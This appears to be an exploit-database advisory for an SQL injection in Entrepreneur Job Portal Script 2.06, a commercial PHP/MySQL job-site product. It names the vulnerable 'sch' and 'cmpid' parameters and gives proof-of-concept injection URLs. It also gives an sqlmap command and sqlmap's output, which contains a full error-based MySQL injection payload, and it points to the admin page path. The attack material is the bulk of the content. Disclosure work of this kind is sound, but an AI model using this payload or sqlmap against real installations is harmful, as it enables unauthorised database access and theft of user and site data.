Entrepreneur Job Portal Script - SQL Injection Vulnerability

🗓️ 08 Oct 2016 00:00:00Reported by OoN_BoyType

zdt🔗 0day.today👁 106 Views

Entrepreneur Job Portal Script SQL Injection Vulnerability in PHP & MySQ

[x]========================================================================================================================================[x]
 | Title        : Entrepreneur Job Portal Script SQL Injection
 | Software     : Entrepreneur Job Portal Script
 | Version      : 2.06
 | Vendor       : http://www.i-netsolution.com/
 | Demo         : http://www.i-netsolution.com/item/entrepreneur-job-portal-script/live_demo/853208
 | Date         : 07 October 2016
 | Author       : OoN_Boy
[x]========================================================================================================================================[x]
   
   
   
[x]========================================================================================================================================[x]
 | Technology       : PHP
 | Database         : MySQL
 | Price            : $353 - $1399 
 | Description      : Jobsite Script is an advanced PHP job site script to start Job site like all popular . It is a complete script with advanced features.
[x]========================================================================================================================================[x]
   
   
[x]========================================================================================================================================[x]
 | Proof of concept SQL 1   : http://localhost/job-portal/jobsearch_all.html?sch=%Inject_Here%21
 | Proof of concept SQL 2   : http://localhost/job-portal/jobsearch_all.html?cmpid=%Inject_Here%21
 |
 | Admin Page               : http://localhost/[path]/admin/index.php  
[x]========================================================================================================================================[x]
   
   
   
[x]========================================================================================================================================[x]
 | Exploit With Sqlmap
  
    sqlmap -u 'http://localhost/job-portal/jobsearch_all.html?cmpid=31453525536'
     
    ---
    Parameter: cmpid (GET)
        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: cmpid=31453525536' AND (SELECT 8347 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8347=8347,1))),0x7178716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tqjF'='tqjF
    ---

#  0day.today [2018-03-13]  #

08 Oct 2016 00:00Current

7.1High risk

Vulners AI Score7.1